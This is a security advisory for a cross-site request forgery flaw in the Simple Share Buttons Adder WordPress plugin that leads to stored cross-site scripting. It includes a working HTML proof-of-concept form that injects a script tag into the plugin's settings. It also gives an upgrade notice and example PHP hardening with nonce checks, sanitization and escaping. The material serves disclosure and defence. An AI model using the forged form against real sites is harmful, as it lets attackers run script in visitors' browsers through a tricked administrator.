CVSS Summary
| Score | 6.8 Medium |
|---|---|
| Vector | Network |
| Complexity | Medium |
| Authentication | None |
| Confidentiality | Partial |
| Integrity | Partial |
| Availability | Partial |
An attacker who can convince an administrator to visit a link of their choosing can execute arbitrary JavaScript in the context of the homepage, pages, posts, category/archive pages and post excerpts.
Current state: Fixed
If a logged-in administrator user clicks the submit button on this form, a JavaScript alert will display on the homepage. (In a real attack the form can be made to auto-submit using JavaScript.)

```html
<form action="http://scone.local:8000/wp-admin/options-general.php?page=simple-share-buttons-adder" method="POST">
<input type="hidden" name="ssba_options" value="save">
<input type="checkbox" name="ssba_homepage" value="Y">
<input type="text" name="ssba_text_placement" value="below">
<input type="text" name="ssba_before_or_after" value="after">
<input type="text" name="ssba_share_text" value="<script>alert('foo')</script>">
<input type="submit">
</form>
```
Immediately upgrade to version 4.5 or greater.
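The proof of concept above works because the settings save accepts a request that did not originate from the plugin's own form and stores the share text unsanitized. As an added illustration (not the plugin's code and not its actual fix), here is how a WordPress options handler of this kind is hardened on both fronts: a nonce check on save rejects cross-site submissions, and the value is sanitized when stored and escaped when rendered. The `ssba_example_*` function names and the nonce action/field names are hypothetical; the option and field names are taken from the PoC.

```php
<?php
// Added illustrative example, not the plugin's code. Hardens a settings form
// like the one targeted by the PoC: nonce (CSRF) check on save, sanitization
// of the stored value, and escaping at the point of output.

// Hypothetical name: renders the settings form with a nonce field included.
function ssba_example_render_form() {
    $share_text = get_option( 'ssba_share_text', '' );
    echo '<form method="post" action="">';
    // Hidden field carrying a nonce bound to this action and the current user's session.
    wp_nonce_field( 'ssba_example_save', 'ssba_example_nonce' );
    echo '<input type="hidden" name="ssba_options" value="save">';
    echo '<label><input type="checkbox" name="ssba_homepage" value="Y"' .
        checked( 'Y', get_option( 'ssba_homepage', 'N' ), false ) . '> Show on homepage</label>';
    echo '<input type="text" name="ssba_share_text" value="' . esc_attr( $share_text ) . '">';
    submit_button();
    echo '</form>';
}

// Hypothetical name: processes the POST. A request forged from another site
// cannot carry a valid nonce, so check_admin_referer() stops it before any save.
function ssba_example_handle_save() {
    if ( ! isset( $_POST['ssba_options'] ) || 'save' !== $_POST['ssba_options'] ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    check_admin_referer( 'ssba_example_save', 'ssba_example_nonce' );

    // Strip tags and control characters before the value reaches the database.
    $share_text = sanitize_text_field( wp_unslash( $_POST['ssba_share_text'] ?? '' ) );
    update_option( 'ssba_share_text', $share_text );
    update_option( 'ssba_homepage', isset( $_POST['ssba_homepage'] ) ? 'Y' : 'N' );
}

// Hypothetical name: front-end output. Escaping here means that even a bad
// stored value is rendered as text rather than executed in visitors' browsers.
function ssba_example_render_share_text() {
    if ( 'Y' !== get_option( 'ssba_homepage', 'N' ) ) {
        return;
    }
    echo '<p class="ssba-share-text">' . esc_html( get_option( 'ssba_share_text', '' ) ) . '</p>';
}
```

With both layers in place the forged form is rejected at `check_admin_referer()`, and a payload such as the PoC's `<script>` string would be reduced to plain text by `sanitize_text_field()` and neutralised again by `esc_html()` on output.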